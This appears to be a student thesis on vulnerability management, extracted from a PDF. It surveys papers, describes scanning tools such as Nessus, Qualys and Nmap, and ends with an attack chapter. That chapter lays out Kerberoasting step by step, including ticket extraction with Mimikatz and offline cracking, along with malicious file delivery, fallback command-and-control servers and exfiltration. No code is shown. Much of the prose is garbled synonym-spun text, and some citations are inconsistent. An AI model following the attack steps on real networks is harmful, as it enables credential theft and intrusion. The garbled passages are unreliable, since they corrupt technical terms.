TCP/UDP:3389(RDP)
Chapter 2

Literature Survey

2.1 Vulnerability assessment and patching management

Insha Altaf , Firdous ul Rashid , Jawad Ahmad Dar, Vulnerability assessment and
patching management2015 International Conference on Soft Computing Techniques and
Implementations- (ICSCTI) Department of ECE, FET, MRIU, Faridabad, India, Oct
8-10, 2015

Vulnerability assessment is the process of Identifying, quantifying, and prioritizing the

vulnerabilities in a system.

Vulnerability assessment is conducted to determine the weakness inherent in the infor-

mation systems that could be exploited , leading to information system breach.

In this paper they explained about automated testing and manual testing which focuses
on improving the accurateness and exactness of vulnerability testing[1].

2.2 The Research on a Patch Management System for En-

terprise Vulnerability Update

S,M.Furnell, A.AL-Ayed,Duanyang Zhao The Research on a Patch Management System

for Enterprise Vulnerability Update 2009 WASE International Conference on Informa-
tion Engineering,2009 IEEE DOI 10.1109/ICIE.2009.233

Because of worms and viruses which make use of vulnerabilities of computer systems,
applications and network deivces, computer software and applications are getting in
trouble increasingly.

18
Chapter 2. Literature Survey 19

Although there are opportunities to defend these attacks at an earlier stage, people
undergo several serious disturbances because many administrators and users didnt realize
the essentiality of the patch management.

This paper designs and implements a patch management system for vulnerability pre-
caution protection which can efficiently repair vulnerabilities of computer system in time
[2].

2.3 Automated and Safe Vulnerability Assessment

Fanglu Guo,Yang Yu, Tzi-cker Chiueh Automated and Safe Vulnerability Assessment
Proceedings of the 21st Annual Computer Security Applications Conference (ACSAC
2005) 1063-9527 2005 IEEE

Vulnerability assessment(VA) has emerged as a powerful system security administration

tool that can identify vulnerabilities in existing systems, and applications before they
are exploited.

This paper focuses on how to automate the entire process of vulnerability testing and
thus for the rst time makes it feasible to run vulnerability testing autonomously and
frequently [3].

2.4 Integrated Vulnerability Management System for En-

terprise Networks

William Wu, Frederick Yip, Eunice Yiu, Pradeep Ray Integrated Vulnerability Manage-
ment System for Enterprise Networks 2009 International Conference on Soft Computing
Techniques and Implementations -ICSCTI. 2009.

The number of vulnerabilities in enterprise networks,systems and applications has

greatly increased recently as seen from frequent vulnerability reports from organiza-
tions, such as CERT and the Microsoft.

Researchers in a number of organizations are currently working to develop and deploy

frameworks to comprehensively manage these network vulnerabilities.

This paper examines the existing attempts to solve this problem and the gaps in the
existing methodologies[4]
Chapter 2. Literature Survey 20

2.5 Vulnerability Assessment and Penetration Testing of

Web Application

Sangeeta Nagpure, Sonal Kurkure Vulnerability Assessment and Penetration Testing of

Web Application 2017 International Conference on Computing, Communication, Control
and Automation (ICCUBEA).

In an organization proper architecture or assessment is checked by performing the vul-

nerability assessment and penetration testing.

The OWASP top 10 vulnerabilities are considered mainly to secure the web applications
they are 1) Injection, 2)Broken authentication, 3) Sensitive Data exposure, 4) XML
External entities, 5) Broken access control, 6) Security Misconfiguration, 7) cross site
scripting, 8) insecure deserialization, 9)using components with known vulnerabilities,
10) insufficient logging and Monitoring[5].

This paper explains about how to exploitation techniques and vulnerability assessments
of the web applications based on OWASP top 10 vulnerabilties
Chapter 3

Experimental Design & Setup

3.1 Nessus

Nessus is a scanning tool and used remotely, which raises an alert after performing
scanning, if vulnerabilities are discovered that malicious hackers can use to gain access
to any computer, application or network devices etc., you have connected to a network.
Nessus scanner does this by running over 1200 Plugin checks on a given computer, testing
the computer, application or network devices to see if any of these attacks could be used
to break or otherwise harm it.

Nessus components

•Policy creation
Policy allow you to create custom templates defining what actions are performed during
a scan. Once created they can be selected from the list of scan templates. You can able
select the type of scanner to perform on the devices in the network. Scanner are used to
detect what types of vulnerabilities exist in the devices. You can also create your own
Policy based on the requirement. User defined policies are mainly used for compliance
and plugin ids.

•Credentials
We can perform authentication and non-authentication scans. There are five types of
categories available. Cloud services Database Host Miscellaneous Plaintext authen-
tication

•Compliance
Compliance means conforming or setting a rule, such as policy, specification. Maintain-
ing a standard based on the requirement. The goal set by the organizations aspire to

21
Chapter 3. Experimental Design & Setup 22

Figure 3.1: Nessus Architecture

achieve the efforts to ensure take steps to comply with regulations, policies and relevant
laws.
Examples:
CIS Amazon Web Services Foundations Audit.
CIS Cisco Firewall
CIS Apache Tomcat
CIS Apple MacOS
CIS Centos
CIS Microsoft Windows 10 Enterprise

•Plugins
Plugins are simple programs or scripts that runs against a target device looking for
vulnerabilities.
Examples:
Backdoors
Databases
CISCO
Firewalls
Chapter 3. Experimental Design & Setup 23

FTP
DNS

Nessus Scanning Process:

1)Login to Nessus account

2)Create a policy
Select new policy
Select the scanner which you want to run on target device
Give the basic details

3)Select the Discovery and change the details based on requirement of below.
o Host Discovery
o Port scanning
o Service discovery

4)Select the Assessment and change the details based on requirements of below
o General
o Brute force
o Web Applications
o Windows
o Malware

5)Select the required audit for the vulnerability scan

6)Select the required plugins if you want to check for particular Vulnerabilities.

7)Save the Policy

8)Create a new Folder to perform scan
9)Go to the respective folder
10)Click on new scan
11)Select the scanner based on your requirement
12)Give the authentication details to perform intrusive scan otherwise the skip the step
13)Schedule the scan based on timing
14)Click on save and run the scan.
Chapter 3. Experimental Design & Setup 24

3.2 Qualys

Qualys provides the cloud security, compliance and related services based in Foster city,
California. Qualys is the first company to deliver the vulnerability management (VM)
solutions as applications through the web using SaaS( software as a service) model. It
also provide some other services like web application scanning, web application firewall,
cloud view, cloud agent etc.,

Figure 3.2: Vulnerability Management Life Cycle

Vulnerability management module in Qualys

Host Assets
The assets on which we want to perform vulnerability scanning. Here we can add and
remove ips and three types of scans can be performed.
1) IP Tracked hosts
2) DNS Tracked hosts
3) Netbios Tracked hosts

Knowledge base
This is the central repository of the all vulnerabilities which are having real time threat
indicaton and non real time threat indication.
Vulnerabilities are categorised into 3 types
Potential vulnerability:
Chapter 3. Experimental Design & Setup 25

A vulnerability is classified in to potential when the Qualys can gather more than one
evidence of the weakness can be exploited.
Confirmed vulnerability:
A vulnerability is classified in to confirmed when it can only gather one evidence, so this
type of vulnerability needs a manual verification.
Information gathered:
Payloads of qualys will try to gather the information of assets like open ports, services
running, operating systems etc.,

Search list
Search list will helps to create the templates of knowledge base, so we can perform a
specific vulnerability scans on the systems. Types of search lists:
1) Static search list- Manually defined.
2) Dynamic search list- Defined based on search criteria.

Option profile
Option profile is like scan settings to be used for vulnerability scanning. In this you can
specify about open ports, QIDs etc.,

Scan
Scan will help to create and launch a scan or schedule the scan. We can specify by
giving authentication details that we can perform intrusive and non-intrusive scan.

Report
Report will give the details of vulnerabilities, operating systems and services running in
the assets. Here we can create a specific templates based on our requirements like QIDs,
Vulnerabilities, Severity etc.,

Remediation
Remediation will helps to create the tickets based on vulnerabilities and track them.
Here vulnerabilities are defined in 4 ways after launching the scan.
1) New Vulnerability was identified first time in the device after scan.
2) Active- Same vulnerability was identified second time after rescan then it is active.
3) Closed- Vulnerability is not identified after scan then it is closed.
4) Reopened- Vulnerability is not eliminated and closed, then it is reopened status after
rescan.
Chapter 3. Experimental Design & Setup 26

Vulnerability scanning in qualys

1) Hosts
In this phase we will discover what are the devices are live to perform the vulnerability
scanning
2) Port Scanning
Finds all the open UDP and TCP Ports on the devices
3) Service Discovery
Identifies the services running on open ports
4) Device Identification
Identifies the operating system through the first open port
5) Vulnerability assessment
Assessment will be based on
1) Operating system
2)Active services
3)Installed software
6) Module launching
Specific vulnerability modules will be loaded based on the information gathered during
the previous phases.
7) Signatures
1) Template based vulnerability signatures
2) Non-intrusive tests for almost all detections
3) Specially crafted request will be sent to host to distinguish whether patched or un-
patched versions
4) Multiple tests are performed to validate or confirm the vulnerability
Chapter 3. Experimental Design & Setup 27

3.3 Nmap

Nmap (”Network Mapper”) is a free and open source (permit) utility for system revela-
tion and security inspecting. Numerous frameworks and system executives additionally
think that its valuable for undertakings, for example, organize stock, overseeing admin-
istration redesign calendars, and checking host or administration uptime. Nmap utilizes
crude IP bundles in novel approaches to figure out what has are accessible on the sys-
tem, what administrations (application name and form) those hosts are putting forth,
what working frameworks (and OS variants) they are running, what sort of parcel chan-
nels/firewalls are being used, and many different qualities. It was intended to quickly
filter extensive systems, however works fine against single hosts. Nmap keeps running
on all significant PC working frameworks, and authority paired bundles are accessible
for Linux, Windows, and Mac OS X. Notwithstanding the great direction line Nmap ex-
ecutable, the Nmap suite incorporates a propelled GUI and results watcher (Zenmap),
an adaptable information exchange, redirection, and troubleshooting device (Ncat), an
utility for looking at sweep results (Ndiff), and a bundle age and reaction examination
device (Nping).
Nmap can be used for
1)Host discovery
2)Port discovery / enumeration
3)Service discovery
4)Operating system version detection
5)Hardware (MAC) address detection
6)Service version detection
7)Vulnerabilities detection, using Nmap scripts (NSE)
Chapter 3. Experimental Design & Setup 28

3.4 Python

Python language is an interpreted high-level programming language which is used for

general-purpose programming and it was Created by Guido van Rossum. Python was
rst released in 1991, Python has a design philosophy that will emphasizes syntax, and
code reliability that helps the programmers to write concepts in very few lines of code
notably using signicant whitespace(indentation). python provides constructs which en-
able clear programming on both large and small scales. Python includes a dynamic sort
framework and programmed memory the executives. It underpins different program-
ming ideal models, including object-situated, basic, useful and procedural, and has an
extensive and exhaustive standard library. Python mediators are accessible for some
working frameworks. CPython, the reference execution of Python, is open source pro-
gramming and has a network based improvement display, as do about the majority of
its variation usage. CPython is overseen by the non-prot Python Software Foundation.
Python modules used
1) Socket
2) Threading
3) OS
4) Time
Chapter 3. Experimental Design & Setup 29

3.5 Maltego

Maltego is intelligent information mining apparatus which gives and shows coordinated
diagrams for connection examination. Maltego instrument is utilized mailnly for online
examinations to discover interconnection between a few snippets of data from different
sources which situated on the Internet.
This instrument utilizes changes to self work the way toward questioning unmistakable
information sources. This data is then displayed on a hub based diagram appropriate
for directing connection examination.
As of now there are 3 variants of the Maltego customer to be specific Maltego XL, Mal-
tego Classic and Maltego CE, we primarily will concentrate on Maltego CE(community
version).
Each of the three versiond of Maltego customers will approach a library of standard
changes for the revelation of information from a wide scope of open sources that are
ordinarily utilized in advanced criminology and in online examinations.
Since Maltego can totally coordinate with about any data source numerous data sellers
have utilized this apparatus as a conveyance stage for the most part for their infor-
mation. This additionally implies Maltego can be appropriate to your own, particular
necessities.
The focal point of Maltego is inspecting this present reality connections between infor-
mation that is publically available on the Internet. This incorporates data social event
of Internet foundation just as get-together data about the association and individuals
who possess it.
Maltego can be utilized to look at the connections between the accompanying elements:
1) Peoples details like Names,Email addresses, Aliases.
2) Groups of individuals (informal organizations).
3)Companies.
4)Organizations.
5)Web destinations.
6)Internet framework for example Domains, DNS names, Netblocks, IP addresses, Affil-
iations.
7)Documents and documents.
Connection between these snippets of data are discovered utilizing open source insight
(OSINT) strategies by questioning sources, for example, DNS records, whois records,
web crawlers, informal communities, different online APIs and removing meta informa-
tion.
Maltego gives results in a wide scope of graphical formats that consider bunching of data
which makes seeing connections moment and precise this makes it conceivable to see
Chapter 3. Experimental Design & Setup 30

concealed associations regardless of whether they are three or four degrees of partition
separated.
Chapter 3. Experimental Design & Setup 31

3.6 OSINT Framework

OSINT Framework, as its name infers, is a cybersecurity structure, a gathering of OSINT

instruments to make your intel and information accumulation assignments less demand-
ing.
This instrument is generally utilized by security analysts and infiltration analyzers for
advanced footprinting, OSINT explore, knowledge social occasion, and observation.
It gives a straightforward online interface that enables you to peruse distinctive OSINT
instruments separated by classes. It likewise gives a phenomenal characterization of all
current intel sources, making it an extraordinary asset for recognizing what infosec zones
you are fail to investigate, or what will be the following recommended OSINT ventures
for your examination.
OSINT Framework is ordered dependent on various subjects and objectives. This can
be effectively observed while investigating the OSINT tree accessible through the web
interface.
When you click any of the classifications, for example, Username, Email Address, or
Domain Name, a ton of helpful assets will show up on the screen, as a sub-tree.
Scanning for clients, email addresses, IP locations or informal community subtleties
turns out to be excessively simple as you have every one of the apparatuses accessible
in one single interface. It’s much the same as a monster OSINT bookmarks library.
For instance, inside IP Address, explicitly through the Protected by Cloud Services seg-
ment, you will discover connections to CloudFlare Watch and CloudFail. With regards
to Domain and DNS History, you’ll locate a couple of instruments in the PassiveDNS-
section, including our very own SecurityTrails toolbox, Mnemonic, PTRarchive.com,
and DNS Dumpster. As you probably are aware, with SecurityTrails you’re ready to
investigate area DNS history, alongside helpful data about IP addresses, authentic IP
records, WHOIS history, and correspond such data in a solitary spot.
Another intriguing classification that grabbed our eye was ”Vulnerabilities,” found in-
side the Domain Names classification, which offers access to a ton of good weakness and
best CVE databases, for example,
1) Mage Scan
2) Sn1per (T)
3) ASafaWeb
4) Zone-H.org
5) XSSposed.org
Chapter 3. Experimental Design & Setup 32

Figure 3.3: Open Source Intellignece Framework(OSINT)

Chapter 3. Experimental Design & Setup 33

Figure 3.4: sub domains of OSINT framework

Chapter 3. Experimental Design & Setup 34

3.7 Command and Control Activity

The command and control attack represents how client systems communicate with server
systems under their control in the target network. Client systems can establish com-
mand control activity with various levels of stealthiest, depending on network topology
and system configuration.
Due to the large degree of differences available to the client systems at network level, the
differences in command and control attack were described by the most common factors.
Commonly used techniques for command and control
1)commonly used port
To bypass network detection and firewalls and to have a normal network activity to not
get detected client systems may communicate on a commonly used port.
Commonly open ports such as
TCP:80(HTTP)
TCP:443(HTTPS)
TCP:25(SMTP)
TCP/UDP:53(DNS)
TCP/UDP:135(RPC)
TCP/UDP:22(SSH)
TCP/UDP:3389(RDP)

2)Uncommonly used port

Client systems may conduct Command and control communications with a server sys-
tem over a un commonly used port to sneak from the firewalls and proxies which are
improperly configured.
Chapter 4

Experiments & Results

4.1 Vulnerability Management using Nessus

Nessus is one of the tool which is used for vulnerability scanning, we can perform both
intrusive and non-intrusive scanning . Step by step process for finding the vulnerabilities
in the devices using nessus.
•Assetinventory(Gatherthedevicesonwhichtoperf ormscanning)
• LoginintoN essusV ulnerabilityscan
• CreateaN ewP olicy
• SelecttheP olicyT emplate(AdvancedScan, N etworkScanetc.)
• GivetheBasicdetailsandpermissionsf orthetemplate
• SelecttheAuthenticatedscanif youwanttoperf ormintrusiveScan
• GototheComplianceT abf orP erf ormingSpecif icauditf orthesystem.
• SelecttheRequiredP luginsandSavetheP olicy
• createaN ewScan
• SelecttherequiredP olicy
• EntertheN etblocks, IP sorHostnamesinT argetT ab
• LaunchtheScan.
• ExporttheDataoncetheScanisover.
• Rescanthedevicesaf tertheremediationprocesstoverif y.

35
Chapter 4. Experiments & Results 36

4.1.1 Results

1) List of vulnerability scans performed, we can find list of scans performed in my scans
folder.

Figure 4.1: List of scans performed

2)After giving the net-block ranges for scan, Nessus will find which are live in the net-
work and will scan those devices with payloads to find the vulnerabilities.
Vulnerabilities are categorized in four ways
1) Critical Vulnerabilities
2) High Vulnerabilities
3) Medium Vulnerabilities
4) Low Vulnerabilities

Figure 4.2: Categorization of Vulnerabilities

Chapter 4. Experiments & Results 37

3)We can see the list of Vulnerabilities which are found on devices and categorized based
on the criticality.
These are few of the vulnerabilities found during vulnerability scan.
1) Microsoft windows server 2003 unsupported version.
2) Portable SDK for UPnp Devices.
3) SSL Version 2 and 3 Protocol detection.
4) Microsoft Windows Server Service Crafted RPC Request Handling.
5) Security Update for Microsoft Windows SMB Server(ETERNAL BLUE).
6) Oralce TNS Listener.
7) Dropbear SSH server.

Figure 4.3: List of Vulnerabilities after Scanning

Chapter 4. Experiments & Results 38

4)Detailed information about the vulnerabilities will be provide by the Nessus. Below is
the Vulnerability information about windows server 2003 which has a unsupported ver-
sion detection.We can also check the Risk factor, CVE Details, CVE Score etc., Nessus
will also provide the solution for the Vulnerability.

Figure 4.4: Detail information about Vulnerability

Chapter 4. Experiments & Results 39

4.2 Vulnerability Management using Qualys

1)Qualys Dashboard shows the Vulnerabilities based on the severity, total scans pre-
formed with status. It also shows the Top 10 Vulnerabilities and particular vulnerabili-
ties based on our requirements.

Figure 4.5: Qualys Dashboard

2)Knowledge Base consists of all the vulnerabilities which are exploitable and non ex-
ploitable. In qualys every vulnerability will have a unique QID and they will give how
severity is the vulnerability.
Chapter 4. Experiments & Results 40

Figure 4.6: Knowledge Base of Qualys

3) Search lists are two types, they are static list and Dynamic list. Static list are
created based on QIDs which are fixed for scanning and they wont changed based on
new updations in the knowledge base. Dynamic list created based on the vulnerability
title, QIDs, Severity, Exploitation, Operation systems etc,.

Figure 4.7: Search List in Qualys

4) Host assets consists of details of IP Addresses, DNS Names, Net-Bios Names. It will
Chapter 4. Experiments & Results 41

also have information about IPs purchased and Subscription.

Figure 4.8: Host Assets in Qualys

5) Asset Groups are created based on IP addresses, DNS Names, Net-Bios Names which
belongs to specific groups or domains. This will be created based on the business jus-
tification like how critical or important for the organization. Groups will be created by
choosing the available hosts or we can give the ranges to perform scanning.
6) Option profiles are like scan setting how we want to perform the vulnerability scan-
ning.we have to open ports, vulnerability detection, authentication type etc,. we have
to select what are the payloads we have to perform on Target system , this we can select
the custom option in vulnerability detection.
Chapter 4. Experiments & Results 42

Figure 4.9: Asset Groups in Qualys

Figure 4.10: Option profiles in Qualys

Chapter 4. Experiments & Results 43

7) Scan is created based on the Option profiles and asset groups on which we want to
perform. We can schedule the scans based on convenience or availability of hosts.

Figure 4.11: List of Scans Created

Chapter 4. Experiments & Results 44

4.2.1 Results

Qualys will give detailed information about the Vulnerabilities in devices. Two types of
scans are performed by Qualys.
1)Discovery Scan
Discovery scan we helps to find the live hosts in the network and Qualys will probe the
target system with icmp requests or try to do telnet connections. If the ping probes are
blocked by firewall then Qualys will use the telnet connections.

2) Vulnerability Scan
Vulnerability scan will send the payloads to the Target systems and checks it can find
the any evidences of exploiting the systems. Vulnerability scan be either intrusive scan
or non intrusive scan, intrusive scan requires the authentication details.

Figure 4.12: scan details after scanning

Chapter 4. Experiments & Results 45

Figure 4.13: Vulnerability with severity and operating system details

Figure 4.14: Vulnerabilities with detailed information

Chapter 4. Experiments & Results 46

4.3 Cyber Attack

Figure 4.15: scanning the active directory for SPN values

Kerberoasting assault exploits how administration accounts influence Kerberos valida-

tion with Service Principal Names (SPNs). In the event that you recollect, in the surveil-
lance post we concentrated on finding administration accounts by examining for client
articles’ SPN esteems. Kerberoasting enables us to split passwords for those records. By
signing into an Active Directory area as any validated client, we can demand administra-
tion tickets (TGS) for administration accounts by indicating their SPN esteem. Dynamic
Directory will restore an encoded ticket, which is scrambled utilizing the NTLM hash of
the record that is related with that SPN. You can then beast constrain these adminis-
tration tickets until effectively split, with no danger of identification or record lockouts.
When broken, you have the administration account secret phrase in plain content.

Regardless of whether you don’t completely comprehend the inward activities of Ker-
beros, the assault can be abridged as:

1. Scan Active Directory for client accounts with SPN values set.
2. Request administration tickets from AD utilizing SPN values.
3. Extract administration tickets to memory and spare to a record.
4. Brute power assault those passwords disconnected until broke.

Considering those means, you can envision how simple it might be to gain admittance to
a space and start splitting all administration accounts inside minutes. From that point,
it’s only a cat-and-mouse amusement until you have traded off at least one administra-
tion accounts.
Stage 1 Obtain a rundown of SPN values for client accounts
Chapter 4. Experiments & Results 47

We center around client accounts since they have shorter, less secure passwords. PC ac-
counts have long, mind boggling, arbitrary passwords that change every now and again.
There are numerous approaches to get this data, including:
1)PowerShell and LDAP questions, as shrouded in my past post.

2)Active Directory Module for PowerShell.

3)GetUserSPNs content given by Kerberoast toolbox.

4)Get-NetUser direction of PowerSploit.

Stage 2 Request Service Tickets for administration account SPNs

To do this, you have to just execute a few lines of PowerShell and an administration
ticket will be returned and put away in memory to your framework. These tickets are
scrambled with the secret phrase of the administration account related with the SPN.
We are practically prepared to begin splitting them.

Stage 3 Extract Service Tickets Using Mimikatz

Mimikatz enables you to remove neighborhood tickets and spare them to circle. We have
to do this so we can pass them into our secret word splitting content. To do this, you
should introduce Mimikatz and issue a solitary order.

Stage 4 Crack the Tickets

Since you have the tickets spared to circle, you can start breaking the passwords. Break-
ing administration accounts is an especially effective methodology in light of the fact
that their passwords in all respects seldom change. Likewise, breaking the tickets dis-
connected won’t cause any space traffic or record lockouts, so it is imperceptible.
The Kerberoasting toolbox gives a valuable Python content. It can take some arrange-
ment to ensure you have the expected condition to run the content; there is a valuable
blog here, which covers those subtleties for you. The content will run a word reference
of passwords as NTLM hashes against the administration tickets you have extricated
until it can effectively open the ticket. When the ticket can be opened, you have broken
the administration account and are given its unmistakable content secret key!
Chapter 4. Experiments & Results 48

Figure 4.16: Scanning the segment for live hosts

One of the absolute initial phases in any system surveillance mission is to lessen an (oc-
casionally immense) arrangement of IP ranges into a rundown of dynamic or fascinating
hosts. Checking each port of each and every IP address is moderate and generally su-
perfluous. Obviously what makes a host fascinating depends significantly on the output
purposes. System heads may just be keen on hosts running a specific administration,
while security evaluators may think about each and every gadget with an IP address. A
director might be open to utilizing only an ICMP ping to find has on his inward system,
while an outer infiltration analyzer may utilize a differing set of many tests trying to
avoid firewall confinements.

Since host revelation needs are so assorted, Nmap offers a wide assortment of alterna-
tives for redoing the procedures utilized. Host revelation is at times called ping check,
however it goes well past the basic ICMP reverberation demand bundles related with
the pervasive ping apparatus. Clients can skirt the ping step completely with a rundown
check (- sL) or by incapacitating ping (- Pn), or draw in the system with discretionary
mixes of multi-port TCP SYN/ACK, UDP, SCTP INIT and ICMP tests. The objective
of these tests is to request reactions which show that an IP address is really dynamic (is
being utilized by a host or system gadget). On numerous systems, just a little level of
IP tends to are dynamic at some random time. This is especially normal with private
location space, for example, 10.0.0.0/8. That arrange has 16 million IPs, however I have
seen it utilized by organizations with not exactly a thousand machines. Host disclosure
can discover those machines in an inadequately dispensed ocean of IP addresses.
Chapter 4. Experiments & Results 49

Figure 4.17: Transfering the payload to live hosts

Some run of the mill instances of the manner in which malevolent payloads cause harm:
Information robbery: Particularly regular is the burglary of delicate data, for example,
login accreditations or money related data through different types of information breaks.
Movement checking: An executed malevolent payload may serve to screen client action
on a PC, this should be possible for the reasons for spying, coercion, or to total buyer
conduct which can be sold to promoters.
Showing commercials: Some pernicious payloads work to show tireless, undesirable pro-
motions, for example, pop-ups and pop-unders to the person in question.
Erasing or changing records: This is a standout amongst the most genuine results to
emerge from a malignant payload. Records can be erased or adjusted to either influence
the conduct of a PC, or even handicap the working framework or potentially startup
forms. For instance some noxious payloads are intended to ’block’ cell phones, which
means they can never again be turned on or utilized in any capacity.
Downloading new records: Some malevolent payloads come in lightweight documents
that are anything but difficult to circulate, yet once executed they will trigger the down-
load of an a lot bigger bit of noxious programming.
Running foundation forms: A vindictive payload can likewise be activated to discreetly
run procedures out of sight, for example, digital currency mining or information stock-
piling.
Chapter 4. Experiments & Results 50

Figure 4.18: Command and control with the users

command and control attack represents how client systems communicate with server
systems under their control in the target network. Client systems can establish command
control activity with various levels of stealthiest, depending on network topology and
system configuration.
Due to the large degree of differences available to the client systems at network level, the
differences in command and control attack were described by the most common factors.
Transfer the malicious file to all the live hosts in the network in regular intervals.if

Figure 4.19: Transfer the malicious file to the users

one command and control server is blocked we can use secondary command and control
sever.
Chapter 4. Experiments & Results 51

Figure 4.20: Exfiltration the confidential data

Information, for example, delicate records, might be exfiltrated using robotized prepar-
ing or Scripting in the wake of being assembled amid Collection. At the point when
computerized exfiltration is utilized, other exfiltration systems likely apply also to ex-
change the data out of the system, for example, Exfiltration Over Command and Control
Channel and Exfiltration Over Alternative Protocol. Examples
CosmicDuke, Honeybee, Rover, TINYTYPHON, USBStealer
Chapter 4. Experiments & Results 52

4.3.1 code

Figure 4.21: Command and control code

Chapter 5

Conclusions

5.1 Vulnerability management

Organizations of any size, or even individuals who face an increased risk of cyberattacks,
can benefit from some form of vulnerability assessment, but large enterprises and other
types of organizations that are subject to ongoing attacks will benefit most from vulner-
ability analysis. Vulnerability Scanning will help the security professionals on the front
lines quickly and easily identify and fix vulnerabilities - including software flaws, missing
patches, malware, and misconfigurations - across a variety of operating systems, devices
and applications.

5.1.1 Future Enhancement

Automating the vulnerability management to remediate the vulnerabilities quickly.

References S,M.Furnell, A.AL-Ayed , The Research on a Patch Management System

for Enterprise Vulnerability Update ,2009 WASE International Conference on Informa-
tion Engineering Fanglu Guo ,Yang Yu, Tzi-cker Chiueh, Automated and Safe Vul-
nerability Assessment, IEEE International Conference on. IEEE, 2013. Vernotte,
Alexandre. ”Research Questions for Model-Based Vulnerability Testing of Web Ap-
plications.” Software Testing, Verification and Validation (ICST), 2013 IEEE Sixth In-
ternational Conference on. IEEE, 2013. Nessus, Conguring Nessus to perform local
security checks on Unix hosts. http://nessus.org/documentation/ index.php?doc=ssh
Insha Altaf , Firdous ul Rashid , Jawad Ahmad Dar Vulnerability Assessment and
Patching Management, 2015 International Conference on Soft Computing Techniques
and Implementations. Sangeeta Nagpure, Sonal Kurkure Vulnerability Assessment and
Penetration Testing of Web Application 2017 International Conference on Computing,
53
Chapter 5. Conclusions 54

Communication, Control and Automation (ICCUBEA). Prashant S. Shinde ; Shrikant

B. Ardhapurkar Cyber security analysis using vulnerability assessment and penetra-
tion testing 2016 World Conference on Futuristic Trends in Research and Innovation for
Social Welfare (Startup Conclave), 29 Feb.-1 March 2016 OWASP top 10 Vulnerabilities
https://www.owasp.org/index.php/Category:OWASPT opT enP roject.HessaM ohammedZaherAlShebl
4M ay2018
Bibliography

[1] Jawad Ahmad Dar Mohd. Rafiq Insha Altaf, Firdous ul Rashid. Vulnerability
assessment and patching management. International Conference on Soft Com-
puting Techniques and Implementations (ICSCTI), pages 16–21, oct 2015. URL
https://ieeexplore.ieee.org/document/7489631.

[2] A.AL-Ayed Duanyang Zhao S, M.Furnell. The research on a patch management

system for enterprise vulnerability update. 2009 WASE International Conference
on Information Engineering, 2(3):250–253, july 2009. URL https://ieeexplore.
ieee.org/abstract/document/5211409.

[3] Tzi-cker Chiueh Fanglu Guo, Yang Yu. Automated and safe vulnerability assessment.
21st Annual Computer Security Applications Conference (ACSAC’05), pages 10–PP,
Dec 2005. URL https://ieeexplore.ieee.org/abstract/document/1565243.

[4] Eunice Yiu Pradeep Ray William Wu, Frederick Yip. Integrated vulnerability
management system for enterprise networks. 2005 IEEE International Confer-
ence on e-Technology, e-Commerce and e-Service, pages 698–703, Mar 2005. URL
https://ieeexplore.ieee.org/abstract/document/1565243.

[5] Sonal Kurkure Sangeeta Nagpure. Vulnerability assessment and penetration test-
ing of web application. 2017 International Conference on Computing, Communi-
cation, Control and Automation (ICCUBEA), pages 1–6, Aug 2017. URL https:
//ieeexplore.ieee.org/abstract/document/8463920.

55